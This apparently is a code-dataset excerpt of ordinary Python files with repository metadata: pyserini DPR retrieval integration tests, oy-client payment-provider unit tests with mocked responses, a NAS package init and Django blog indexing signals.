| 28.607877 | 87 | 0.696295 | 2,025 | 16,707 | 5.37037 | 0.057778 | 0.050207 | 0.048276 | 0.039724 | 0.898023 | 0.871356 | 0.834391 | 0.814069 | 0.787402 | 0.78069 | 0 | 0.00195 | 0.202071 | 16,707 | 583 | 88 | 28.656947 | 0.813817 | 0.025798 | 0 | 0.656 | 0 | 0 | 0.117821 | 0.046375 | 0 | 0 | 0 | 0 | 0.056 | 1 | 0.072 | false | 0 | 0.013333 | 0 | 0.085333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
136b2acd5b7f4020562c6c22bbac026b4745a54b | 14,542 | py | Python | integrations/test_dpr.py | naydoummar/pyserini | 8a70bc15d73ad84b7e79598baf03ef987efdc87f | [
"Apache-2.0"
] | null | null | null | integrations/test_dpr.py | naydoummar/pyserini | 8a70bc15d73ad84b7e79598baf03ef987efdc87f | [
"Apache-2.0"
] | null | null | null | integrations/test_dpr.py | naydoummar/pyserini | 8a70bc15d73ad84b7e79598baf03ef987efdc87f | [
"Apache-2.0"
] | null | null | null | #
# Pyserini: Python interface to the Anserini IR toolkit built on Lucene
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""Integration tests for DPR model using pre-encoded queries."""
import os
import socket
import unittest
from integrations.utils import clean_files, run_command, parse_score
class TestSearchIntegration(unittest.TestCase):
def setUp(self):
self.temp_files = []
self.threads = 12
self.batch_size = 36
# Hard-code larger values for internal servers
if socket.gethostname().startswith('damiano') or socket.gethostname().startswith('orca'):
self.threads = 36
self.batch_size = 144
def test_dpr_nq_test_bf(self):
output_file = 'test_run.dpr.nq-test.multi.bf.trec'
retrieval_file = 'test_run.dpr.nq-test.multi.bf.json'
self.temp_files.extend([output_file, retrieval_file])
cmd1 = f'python -m pyserini.dsearch --topics dpr-nq-test \
--index wikipedia-dpr-multi-bf \
--output {output_file} \
--batch-size {self.batch_size} --threads {self.threads}'
cmd2 = f'python -m pyserini.eval.convert_trec_run_to_dpr_retrieval_run --topics dpr-nq-test \
--index wikipedia-dpr \
--input {output_file} \
--output {retrieval_file}'
cmd3 = f'python -m pyserini.eval.evaluate_dpr_retrieval --retrieval {retrieval_file} --topk 20'
status1 = os.system(cmd1)
status2 = os.system(cmd2)
stdout, stderr = run_command(cmd3)
score = parse_score(stdout, "Top20")
self.assertEqual(status1, 0)
self.assertEqual(status2, 0)
self.assertAlmostEqual(score, 0.7947, places=4)
def test_dpr_nq_test_bf_bm25_hybrid(self):
output_file = 'test_run.dpr.nq-test.multi.bf.bm25.trec'
retrieval_file = 'test_run.dpr.nq-test.multi.bf.bm25.json'
self.temp_files.extend([output_file, retrieval_file])
cmd1 = f'python -m pyserini.hsearch dense --index wikipedia-dpr-multi-bf \
sparse --index wikipedia-dpr \
fusion --alpha 1.3 \
run --topics dpr-nq-test \
--batch-size {self.batch_size} --threads {self.threads} \
--output {output_file} '
cmd2 = f'python -m pyserini.eval.convert_trec_run_to_dpr_retrieval_run --topics dpr-nq-test \
--index wikipedia-dpr \
--input {output_file} \
--output {retrieval_file}'
cmd3 = f'python -m pyserini.eval.evaluate_dpr_retrieval --retrieval {retrieval_file} --topk 20'
status1 = os.system(cmd1)
status2 = os.system(cmd2)
stdout, stderr = run_command(cmd3)
score = parse_score(stdout, "Top20")
self.assertEqual(status1, 0)
self.assertEqual(status2, 0)
self.assertAlmostEqual(score, 0.8260, places=4)
def test_dpr_trivia_test_bf(self):
output_file = 'test_run.dpr.trivia-test.multi.bf.trec'
retrieval_file = 'test_run.dpr.trivia-test.multi.bf.json'
self.temp_files.extend([output_file, retrieval_file])
cmd1 = f'python -m pyserini.dsearch --topics dpr-trivia-test \
--index wikipedia-dpr-multi-bf \
--output {output_file} \
--batch-size {self.batch_size} --threads {self.threads}'
cmd2 = f'python -m pyserini.eval.convert_trec_run_to_dpr_retrieval_run --topics dpr-trivia-test \
--index wikipedia-dpr \
--input {output_file} \
--output {retrieval_file}'
cmd3 = f'python -m pyserini.eval.evaluate_dpr_retrieval --retrieval {retrieval_file} --topk 20'
status1 = os.system(cmd1)
status2 = os.system(cmd2)
stdout, stderr = run_command(cmd3)
score = parse_score(stdout, "Top20")
self.assertEqual(status1, 0)
self.assertEqual(status2, 0)
self.assertAlmostEqual(score, 0.7887, places=4)
def test_dpr_trivia_test_bf_bm25_hybrid(self):
output_file = 'test_run.dpr.trivia-test.multi.bf.bm25.trec'
retrieval_file = 'test_run.dpr.trivia-test.multi.bf.bm25.json'
self.temp_files.extend([output_file, retrieval_file])
cmd1 = f'python -m pyserini.hsearch dense --index wikipedia-dpr-multi-bf \
sparse --index wikipedia-dpr \
fusion --alpha 0.95 \
run --topics dpr-trivia-test \
--batch-size {self.batch_size} --threads {self.threads} \
--output {output_file} '
cmd2 = f'python -m pyserini.eval.convert_trec_run_to_dpr_retrieval_run --topics dpr-trivia-test \
--index wikipedia-dpr \
--input {output_file} \
--output {retrieval_file}'
cmd3 = f'python -m pyserini.eval.evaluate_dpr_retrieval --retrieval {retrieval_file} --topk 20'
status1 = os.system(cmd1)
status2 = os.system(cmd2)
stdout, stderr = run_command(cmd3)
score = parse_score(stdout, "Top20")
self.assertEqual(status1, 0)
self.assertEqual(status2, 0)
self.assertAlmostEqual(score, 0.8264, places=4)
def test_dpr_wq_test_bf(self):
output_file = 'test_run.dpr.wq-test.multi.bf.trec'
retrieval_file = 'test_run.dpr.wq-test.multi.bf.json'
self.temp_files.extend([output_file, retrieval_file])
cmd1 = f'python -m pyserini.dsearch --topics dpr-wq-test \
--index wikipedia-dpr-multi-bf \
--output {output_file} \
--batch-size {self.batch_size} --threads {self.threads}'
cmd2 = f'python -m pyserini.eval.convert_trec_run_to_dpr_retrieval_run --topics dpr-wq-test \
--index wikipedia-dpr \
--input {output_file} \
--output {retrieval_file}'
cmd3 = f'python -m pyserini.eval.evaluate_dpr_retrieval --retrieval {retrieval_file} --topk 20'
status1 = os.system(cmd1)
status2 = os.system(cmd2)
stdout, stderr = run_command(cmd3)
score = parse_score(stdout, "Top20")
self.assertEqual(status1, 0)
self.assertEqual(status2, 0)
self.assertAlmostEqual(score, 0.7505, places=4)
def test_dpr_wq_test_bf_bm25_hybrid(self):
output_file = 'test_run.dpr.wq-test.multi.bf.bm25.trec'
retrieval_file = 'test_run.dpr.wq-test.multi.bf.bm25.json'
self.temp_files.extend([output_file, retrieval_file])
cmd1 = f'python -m pyserini.hsearch dense --index wikipedia-dpr-multi-bf \
sparse --index wikipedia-dpr \
fusion --alpha 0.95 \
run --topics dpr-wq-test \
--batch-size {self.batch_size} --threads {self.threads} \
--output {output_file} '
cmd2 = f'python -m pyserini.eval.convert_trec_run_to_dpr_retrieval_run --topics dpr-wq-test \
--index wikipedia-dpr \
--input {output_file} \
--output {retrieval_file}'
cmd3 = f'python -m pyserini.eval.evaluate_dpr_retrieval --retrieval {retrieval_file} --topk 20'
status1 = os.system(cmd1)
status2 = os.system(cmd2)
stdout, stderr = run_command(cmd3)
score = parse_score(stdout, "Top20")
self.assertEqual(status1, 0)
self.assertEqual(status2, 0)
self.assertAlmostEqual(score, 0.7712, places=4)
def test_dpr_curated_test_bf(self):
output_file = 'test_run.dpr.curated-test.multi.bf.trec'
retrieval_file = 'test_run.dpr.curated-test.multi.bf.json'
self.temp_files.extend([output_file, retrieval_file])
cmd1 = f'python -m pyserini.dsearch --topics dpr-curated-test \
--index wikipedia-dpr-multi-bf \
--output {output_file} \
--batch-size {self.batch_size} --threads {self.threads}'
cmd2 = f'python -m pyserini.eval.convert_trec_run_to_dpr_retrieval_run --topics dpr-curated-test \
--index wikipedia-dpr \
--input {output_file} \
--output {retrieval_file}'
cmd3 = f'python -m pyserini.eval.evaluate_dpr_retrieval --retrieval {retrieval_file} --topk 20 --regex'
status1 = os.system(cmd1)
status2 = os.system(cmd2)
stdout, stderr = run_command(cmd3)
score = parse_score(stdout, "Top20")
self.assertEqual(status1, 0)
self.assertEqual(status2, 0)
self.assertAlmostEqual(score, 0.8876, places=4)
def test_dpr_curated_test_bf_bm25_hybrid(self):
    """Hybrid (dense multi-bf + sparse BM25) retrieval on the DPR CuratedTrec test split."""
    output_file = 'test_run.dpr.curated-test.multi.bf.bm25.trec'
    retrieval_file = 'test_run.dpr.curated-test.multi.bf.bm25.json'
    # Register artifacts so tearDown() removes them.
    self.temp_files.extend([output_file, retrieval_file])
    # Hybrid search fusing dense and sparse scores (alpha weights the dense side).
    cmd1 = f'python -m pyserini.hsearch dense --index wikipedia-dpr-multi-bf \
            sparse --index wikipedia-dpr \
            fusion --alpha 1.05 \
            run --topics dpr-curated-test \
            --batch-size {self.batch_size} --threads {self.threads} \
            --output {output_file} '
    # Convert the TREC run to the DPR retrieval JSON evaluated below.
    cmd2 = f'python -m pyserini.eval.convert_trec_run_to_dpr_retrieval_run --topics dpr-curated-test \
            --index wikipedia-dpr \
            --input {output_file} \
            --output {retrieval_file}'
    # --regex: answers for this topic set are matched as regular expressions.
    cmd3 = f'python -m pyserini.eval.evaluate_dpr_retrieval --retrieval {retrieval_file} --topk 20 --regex'
    status1 = os.system(cmd1)
    status2 = os.system(cmd2)
    stdout, stderr = run_command(cmd3)
    score = parse_score(stdout, "Top20")
    self.assertEqual(status1, 0)
    self.assertEqual(status2, 0)
    # Regression value pinned by this test.
    self.assertAlmostEqual(score, 0.9006, places=4)
def test_dpr_squad_test_bf(self):
    """Dense brute-force retrieval on the DPR SQuAD test split."""
    trec_run = 'test_run.dpr.squad-test.multi.bf.trec'
    json_run = 'test_run.dpr.squad-test.multi.bf.json'
    self.temp_files.extend([trec_run, json_run])
    # Dense search against the brute-force FAISS Wikipedia DPR index.
    search_cmd = f'python -m pyserini.dsearch --topics dpr-squad-test \
                  --index wikipedia-dpr-multi-bf \
                  --output {trec_run} \
                  --batch-size {self.batch_size} --threads {self.threads}'
    # Convert the TREC run into the DPR retrieval JSON format.
    convert_cmd = f'python -m pyserini.eval.convert_trec_run_to_dpr_retrieval_run --topics dpr-squad-test \
                   --index wikipedia-dpr \
                   --input {trec_run} \
                   --output {json_run}'
    # Score top-20 retrieval accuracy.
    eval_cmd = f'python -m pyserini.eval.evaluate_dpr_retrieval --retrieval {json_run} --topk 20'
    search_status = os.system(search_cmd)
    convert_status = os.system(convert_cmd)
    stdout, stderr = run_command(eval_cmd)
    top20 = parse_score(stdout, "Top20")
    self.assertEqual(search_status, 0)
    self.assertEqual(convert_status, 0)
    # Regression value pinned by this test.
    self.assertAlmostEqual(top20, 0.5199, places=4)
def test_dpr_squad_test_bf_bm25_hybrid(self):
    """Hybrid (dense multi-bf + sparse BM25) retrieval on the DPR SQuAD test split."""
    output_file = 'test_run.dpr.squad-test.multi.bf.bm25.trec'
    retrieval_file = 'test_run.dpr.squad-test.multi.bf.bm25.json'
    # Register artifacts so tearDown() removes them.
    self.temp_files.extend([output_file, retrieval_file])
    # Hybrid search fusing dense and sparse scores (alpha weights the dense side).
    cmd1 = f'python -m pyserini.hsearch dense --index wikipedia-dpr-multi-bf \
            sparse --index wikipedia-dpr \
            fusion --alpha 2.0 \
            run --topics dpr-squad-test \
            --batch-size {self.batch_size} --threads {self.threads} \
            --output {output_file} '
    # Convert the TREC run to the DPR retrieval JSON evaluated below.
    cmd2 = f'python -m pyserini.eval.convert_trec_run_to_dpr_retrieval_run --topics dpr-squad-test \
            --index wikipedia-dpr \
            --input {output_file} \
            --output {retrieval_file}'
    cmd3 = f'python -m pyserini.eval.evaluate_dpr_retrieval --retrieval {retrieval_file} --topk 20'
    status1 = os.system(cmd1)
    status2 = os.system(cmd2)
    stdout, stderr = run_command(cmd3)
    score = parse_score(stdout, "Top20")
    self.assertEqual(status1, 0)
    self.assertEqual(status2, 0)
    # Regression value pinned by this test.
    self.assertAlmostEqual(score, 0.7511, places=4)
def tearDown(self):
    """Delete the run/retrieval files registered by each test case."""
    clean_files(self.temp_files)
# Allow running this test module directly with the unittest runner.
if __name__ == '__main__':
    unittest.main()
| 55.503817 | 111 | 0.545592 | 1,588 | 14,542 | 4.816121 | 0.110202 | 0.052301 | 0.031381 | 0.062762 | 0.874869 | 0.86637 | 0.863232 | 0.860356 | 0.833421 | 0.833421 | 0 | 0.029421 | 0.354903 | 14,542 | 261 | 112 | 55.716475 | 0.785844 | 0.047586 | 0 | 0.69469 | 0 | 0 | 0.12387 | 0.082291 | 0 | 0 | 0 | 0 | 0.132743 | 1 | 0.053097 | false | 0 | 0.017699 | 0 | 0.075221 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
13855dfc9d136ef375e7087c6e377e09413bd7c6 | 155 | py | Python | nasws/rnn/__init__.py | kcyu2014/nas-landmarkreg | a00c3619bf4042e446e1919087f0b09fe9fa3a65 | [
"MIT"
] | 8 | 2021-04-13T01:52:11.000Z | 2022-03-30T03:53:12.000Z | nasws/rnn/__init__.py | kcyu2014/nas-landmarkreg | a00c3619bf4042e446e1919087f0b09fe9fa3a65 | [
"MIT"
] | 4 | 2021-05-29T01:41:00.000Z | 2021-08-24T09:40:43.000Z | nasws/rnn/__init__.py | kcyu2014/nas-landmarkreg | a00c3619bf4042e446e1919087f0b09fe9fa3a65 | [
"MIT"
] | null | null | null | from .enas_policy import EnasSearchPolicy
from .darts_policy import DartsSearchPolicy
from .nao_policy import NaoSearchPolicy
from .random_policy import *
| 31 | 43 | 0.864516 | 19 | 155 | 6.842105 | 0.526316 | 0.369231 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.103226 | 155 | 4 | 44 | 38.75 | 0.935252 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
1395193b4b821d6266d67d5fce82a4a76ef90350 | 14,889 | py | Python | test/test_provider.py | vousmeevoyez/oy-client | 4630cbcad40f8051d836daa54b649e2064cf4c92 | [
"MIT"
] | 2 | 2020-03-23T00:34:15.000Z | 2020-04-08T10:15:03.000Z | test/test_provider.py | vousmeevoyez/oy-client | 4630cbcad40f8051d836daa54b649e2064cf4c92 | [
"MIT"
] | 1 | 2020-03-28T04:09:51.000Z | 2020-03-28T04:09:51.000Z | test/test_provider.py | vousmeevoyez/oy-client | 4630cbcad40f8051d836daa54b649e2064cf4c92 | [
"MIT"
] | 1 | 2020-05-26T02:03:00.000Z | 2020-05-26T02:03:00.000Z | from unittest.mock import Mock, patch
from decimal import Decimal
import pytest
from oy.provider import OyProvider
from oy.core.exceptions import FetchError, StatusCodeError
from oy.exceptions import ProviderError
@patch("oy.core.remote_call.RemoteCall")
def test_inquiry_account_success(mock_remote_call, setup_request, setup_response):
    """A successful account inquiry exposes bank, account, name and timestamp."""
    # Stub the transport: fetch() returns the canned success payload below.
    canned = setup_response(
        response={
            "status": {"code": "000", "message": "Success"},
            "recipient_bank": "014",
            "recipient_account": "1239812390",
            "recipient_name": "John Doe",
            "timestamp": "16-10-2019 09:55:31",
        }
    )
    mock_remote_call.fetch.return_value = canned.to_representation()
    provider = OyProvider(
        base_url="https://sandbox.oyindonesia.com/staging/partner",
        request=setup_request,
        response=setup_response,
        remote_call=mock_remote_call,
    )
    result = provider.inquiry_account("014", "1239812390")
    # Every field of the inquiry payload must be present and truthy.
    for field in ("recipient_bank", "recipient_account", "recipient_name", "timestamp"):
        assert result[field]
@patch("oy.core.remote_call.RemoteCall")
def test_disburse(mock_remote_call, setup_request, setup_response):
    """A disbursement request returns transaction ids and an integer amount."""
    # Mock fetch() so it returns the canned "Request is Processed" payload.
    mock_response = setup_response(
        response={
            "status": {"code": "101", "message": "Request is Processed"},
            "amount": 125000,
            "recipient_bank": "014",
            "recipient_account": "1239812390",
            "trx_id": "ABC-456",
            "partner_trx_id": "1234-asdf",
            "timestamp": "16-10-2019 10:23:42",
        }
    )
    mock_remote_call.fetch.return_value = mock_response.to_representation()
    provider = OyProvider(
        request=setup_request,
        response=setup_response,
        remote_call=mock_remote_call,
        base_url="https://sandbox.oyindonesia.com/staging/partner",
    )
    response = provider.disburse("014", "1239812390", 125000)
    assert response["trx_id"]
    assert response["partner_trx_id"]
    assert response["recipient_bank"]
    assert response["recipient_account"]
    assert response["amount"]
    # Amount must come back as an int (the old comment wrongly said "decimal");
    # isinstance is preferred over `type(x) == int` (PEP 8).
    assert isinstance(response["amount"], int)
@patch("oy.core.remote_call.RemoteCall")
def test_disburse_status(mock_remote_call, setup_request, setup_response):
    """A disburse-status lookup surfaces all transaction metadata fields."""
    # Mock fetch() so it returns the canned response representation below.
    mock_response = setup_response(
        response={
            "status": {"code": "000", "message": "Success"},
            "amount": 125000,
            "recipient_name": "John Doe",
            "recipient_bank": "008",
            "recipient_account": "1234567890",
            "trx_id": "ABC-456",
            "partner_trx_id": "1234-asde",
            "timestamp": "16-10-2020 10:34:23",
            "created_date": "24-01-2020 06:48:08",
            "last_updated_date": "24-01-2020 06:48:39",
        }
    )
    mock_remote_call.fetch.return_value = mock_response.to_representation()
    provider = OyProvider(
        request=setup_request,
        response=setup_response,
        remote_call=mock_remote_call,
        base_url="https://sandbox.oyindonesia.com/staging/partner",
    )
    response = provider.disburse_status("1234-asde")
    # Each field from the canned payload must be present and truthy.
    assert response["recipient_account"]
    assert response["recipient_name"]
    assert response["recipient_bank"]
    assert response["amount"]
    assert response["trx_id"]
    assert response["partner_trx_id"]
    assert response["timestamp"]
    assert response["created_date"]
    assert response["last_updated_date"]
@patch("oy.core.remote_call.RemoteCall")
def test_get_balance(mock_remote_call, setup_request, setup_response):
    """get_balance() exposes the balance from the API payload."""
    # Stub the transport with a canned success payload.
    stub = setup_response(
        response={
            "status": {"code": "000", "message": "Success"},
            "balance": 125000,
            "timestamp": "10-12-2019 12:15:37",
        }
    )
    mock_remote_call.fetch.return_value = stub.to_representation()
    provider = OyProvider(
        base_url="https://sandbox.oyindonesia.com/staging/partner",
        request=setup_request,
        response=setup_response,
        remote_call=mock_remote_call,
    )
    result = provider.get_balance()
    assert result["balance"]
@patch("oy.core.remote_call.RemoteCall")
def test_generate_va(mock_remote_call, setup_request, setup_response):
    """Creating a virtual account echoes back the VA attributes from the API."""
    # Mock fetch() so it returns the canned response representation below.
    mock_response = setup_response(
        response={
            "id": "12345b1-23be-45670-a123-5ca678f12b3e",
            "status": {"code": "000", "message": "Success"},
            "amount": 10000,
            "va_number": "123456789182827272",
            "bank_code": "002",
            "is_open": False,
            "is_single_use": False,
            "expiration_time": 1582783668175,
            "va_status": "WAITING_PAYMENT",
            "username_display": "va name",
        }
    )
    mock_remote_call.fetch.return_value = mock_response.to_representation()
    provider = OyProvider(
        request=setup_request,
        response=setup_response,
        remote_call=mock_remote_call,
        base_url="https://sandbox.oyindonesia.com/staging/partner",
    )
    response = provider.generate_va("002", "500000", "oy00000001")
    # Values are taken from the canned payload, not from the call arguments.
    assert response["amount"] == 10000
    assert response["va_number"] == "123456789182827272"
    assert response["bank_code"] == "002"
    assert response["is_open"] is False
    assert response["is_single_use"] is False
    assert response["expiration_time"] == 1582783668175
    assert response["va_status"] == "WAITING_PAYMENT"
    assert response["username_display"] == "va name"
@patch("oy.core.remote_call.RemoteCall")
def test_get_va(mock_remote_call, setup_request, setup_response):
    """Fetching VA info by id returns the full VA record, including payment fields."""
    # Mock fetch() so it returns the canned response representation below.
    mock_response = setup_response(
        response={
            "id": "12345b1-23be-45670-a123-5ca678f12b3e",
            "status": {"code": "000", "message": "Success"},
            "amount": 10000,
            "va_number": "123456789182827272",
            "bank_code": "002",
            "is_open": False,
            "is_single_use": False,
            "expiration_time": 1582783668175,
            "va_status": "WAITING_PAYMENT",
            "username_display": "va name",
            "amount_detected": 0,
            "partner_user_id": "123456",
        }
    )
    mock_remote_call.fetch.return_value = mock_response.to_representation()
    provider = OyProvider(
        request=setup_request,
        response=setup_response,
        remote_call=mock_remote_call,
        base_url="https://sandbox.oyindonesia.com/staging/partner",
    )
    response = provider.get_va_info("12345b1-23be-45670-a123-5ca678f12b3e")
    assert response["amount"] == 10000
    assert response["va_number"] == "123456789182827272"
    assert response["bank_code"] == "002"
    assert response["is_open"] is False
    assert response["is_single_use"] is False
    assert response["expiration_time"] == 1582783668175
    assert response["va_status"] == "WAITING_PAYMENT"
    assert response["username_display"] == "va name"
    assert response["amount_detected"] == 0
    assert response["partner_user_id"] == "123456"
@patch("oy.core.remote_call.RemoteCall")
def test_update_va(mock_remote_call, setup_request, setup_response):
    """Updating a VA returns the record with the new attribute values."""
    # Mock fetch() so it returns the canned response representation below.
    mock_response = setup_response(
        response={
            "id": "1414255-12121-21212121-212121",
            "status": {"code": "000", "message": "Success"},
            "amount": 50000,
            "va_number": "1001234000000000001",
            "bank_code": "002",
            "is_open": True,
            "is_single_use": False,
            "expiration_time": 1582802205412,
            "va_status": "WAITING_PAYMENT",
            "username_display": "vaname",
            "partner_user_id": "12345677",
        }
    )
    mock_remote_call.fetch.return_value = mock_response.to_representation()
    provider = OyProvider(
        request=setup_request,
        response=setup_response,
        remote_call=mock_remote_call,
        base_url="https://sandbox.oyindonesia.com/staging/partner",
    )
    # Positional args: id, amount, is_open, is_single_use, then two more
    # update parameters -- presumably expiration and a flag; verify against
    # OyProvider.update_va's signature.
    response = provider.update_va(
        "1414255-12121-21212121-212121", 50000, True, False, 60, False
    )
    assert response["amount"] == 50000
    assert response["va_number"] == "1001234000000000001"
    assert response["bank_code"] == "002"
    assert response["is_open"] is True
    assert response["is_single_use"] is False
    assert response["expiration_time"] == 1582802205412
    assert response["va_status"] == "WAITING_PAYMENT"
    assert response["username_display"] == "vaname"
    assert response["partner_user_id"] == "12345677"
@patch("oy.core.remote_call.RemoteCall")
def test_get_list_of_va(mock_remote_call, setup_request, setup_response):
    """Listing VAs returns the paginated total and the per-VA records."""
    # Mock fetch() so it returns the canned two-entry listing below.
    mock_response = setup_response(
        response={
            "total": 2,
            "data": [
                {
                    "id": "9a660428-3373-436b-b929-ef69698dd26f",
                    "amount": 12000.0000,
                    "va_number": "100536000000000006",
                    "bank_code": "002",
                    "is_open": True,
                    "is_single_use": False,
                    "expiration_time": 1582791896416,
                    "va_status": "EXPIRED",
                    "username_display": "username",
                    "amount_detected": 400000,
                    "partner_user_id": "12345",
                },
                {
                    "id": "de51383f-1557-409c-8542-dcb74ca76375",
                    "amount": 12000.0000,
                    "va_number": "100536000000000005",
                    "bank_code": "002",
                    "is_open": True,
                    "is_single_use": False,
                    "expiration_time": 1582790250609,
                    "va_status": "EXPIRED",
                    "username_display": "username",
                    "amount_detected": 500000,
                    "partner_user_id": "54321",
                },
            ],
            "status": {"code": "000", "message": "Success"},
        }
    )
    mock_remote_call.fetch.return_value = mock_response.to_representation()
    provider = OyProvider(
        request=setup_request,
        response=setup_response,
        remote_call=mock_remote_call,
        base_url="https://sandbox.oyindonesia.com/staging/partner",
    )
    response = provider.get_list_of_va()
    assert response["total"] == 2
    assert len(response["data"]) == 2
@patch("oy.core.remote_call.RemoteCall")
def test_get_list_of_va_multiple_entries(mock_remote_call, setup_request, setup_response):
    """Listing VAs returns the paginated total and the per-VA records.

    Renamed: this function was previously named
    ``test_get_list_of_va_transactions``, which collided with the later test of
    the same name, so it was shadowed and never collected by pytest.  Its body
    exercises ``get_list_of_va`` (not the transactions endpoint), hence the
    new name.
    """
    # Mock fetch() so it returns the canned two-entry listing below.
    mock_response = setup_response(
        response={
            "total": 2,
            "data": [
                {
                    "id": "9a660428-3373-436b-b929-ef69698dd26f",
                    "amount": 12000.0000,
                    "va_number": "100536000000000006",
                    "bank_code": "002",
                    "is_open": True,
                    "is_single_use": False,
                    "expiration_time": 1582791896416,
                    "va_status": "EXPIRED",
                    "username_display": "username",
                    "amount_detected": 400000,
                    "partner_user_id": "12345",
                },
                {
                    "id": "de51383f-1557-409c-8542-dcb74ca76375",
                    "amount": 12000.0000,
                    "va_number": "100536000000000005",
                    "bank_code": "002",
                    "is_open": True,
                    "is_single_use": False,
                    "expiration_time": 1582790250609,
                    "va_status": "EXPIRED",
                    "username_display": "username",
                    "amount_detected": 500000,
                    "partner_user_id": "54321",
                },
            ],
            "status": {"code": "000", "message": "Success"},
        }
    )
    mock_remote_call.fetch.return_value = mock_response.to_representation()
    provider = OyProvider(
        request=setup_request,
        response=setup_response,
        remote_call=mock_remote_call,
        base_url="https://sandbox.oyindonesia.com/staging/partner",
    )
    response = provider.get_list_of_va()
    assert response["total"] == 2
    assert len(response["data"]) == 2
@patch("oy.core.remote_call.RemoteCall")
def test_get_list_of_va_transactions(mock_remote_call, setup_request, setup_response):
    """Listing transactions of a VA returns the transaction rows and count."""
    # Mock fetch() so it returns the canned response representation below.
    mock_response = setup_response(
        response={
            "id": "12345676788898",
            "status": {
                "code": "000",
                "message": "Success"
            },
            "data": [
                {
                    "id": "d9c2963f-be14-4558-9380-5ba1db8ed156",
                    "created": "2020-02-27 07:48:01",
                    "name": "Static VA by username",
                    "amount": 10000,
                    "create_by": "Static VA by username",
                    "last_update_by": "Static VA by username",
                    "last_updated": 1582789681439,
                    "admin_fee": 1000,
                    "va_number": "123456000000000001"
                }
            ],
            "number_of_transaction": 1
        }
    )
    mock_remote_call.fetch.return_value = mock_response.to_representation()
    provider = OyProvider(
        request=setup_request,
        response=setup_response,
        remote_call=mock_remote_call,
        base_url="https://sandbox.oyindonesia.com/staging/partner",
    )
    response = provider.get_list_of_va_transactions("12345676788898")
    assert response["number_of_transaction"] == 1
    assert len(response["data"]) == 1
@patch("oy.core.remote_call.RemoteCall")
def test_inquiry_account_error(mock_remote_call, setup_request, setup_response):
    """A transport-level StatusCodeError must surface as ProviderError."""
    # Make the stubbed transport raise on fetch().
    mock_remote_call.fetch.side_effect = StatusCodeError
    provider = OyProvider(
        base_url="https://sandbox.oyindonesia.com/staging/partner",
        request=setup_request,
        response=setup_response,
        remote_call=mock_remote_call,
    )
    with pytest.raises(ProviderError):
        provider.inquiry_account("014", "1239812390")
| 35.705036 | 86 | 0.610786 | 1,560 | 14,889 | 5.576282 | 0.126282 | 0.074721 | 0.05311 | 0.021497 | 0.837568 | 0.816071 | 0.785378 | 0.780894 | 0.76595 | 0.745948 | 0 | 0.098423 | 0.271879 | 14,889 | 416 | 87 | 35.790865 | 0.703994 | 0.058768 | 0 | 0.670487 | 0 | 0 | 0.287696 | 0.051333 | 0 | 0 | 0 | 0 | 0.151862 | 1 | 0.031519 | false | 0 | 0.017192 | 0 | 0.048711 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
139547c2c0adbd703d502e2a7aea5f37b984df96 | 216 | py | Python | blog/signals.py | MarkusH/talk-django-elasticsearch | cc6aad93f1cc4b4abc6d2517fa6efab1c12c522e | [
"BSD-3-Clause"
] | 6 | 2015-03-11T16:58:00.000Z | 2016-08-26T06:17:59.000Z | blog/signals.py | MarkusH/talk-django-elasticsearch | cc6aad93f1cc4b4abc6d2517fa6efab1c12c522e | [
"BSD-3-Clause"
] | 3 | 2020-02-11T22:15:41.000Z | 2021-06-01T21:44:15.000Z | blog/signals.py | MarkusH/talk-django-elasticsearch | cc6aad93f1cc4b4abc6d2517fa6efab1c12c522e | [
"BSD-3-Clause"
] | 1 | 2015-10-12T21:50:13.000Z | 2015-10-12T21:50:13.000Z | from . import tasks
def post_save_article(sender, instance, **kwargs):
tasks.index_article.delay(instance.pk)
def post_delete_article(sender, instance, **kwargs):
tasks.unindex_article.delay(instance.pk)
| 21.6 | 52 | 0.763889 | 29 | 216 | 5.482759 | 0.517241 | 0.08805 | 0.264151 | 0.339623 | 0.402516 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.12037 | 216 | 9 | 53 | 24 | 0.836842 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.4 | false | 0 | 0.2 | 0 | 0.6 | 0 | 1 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 6 |
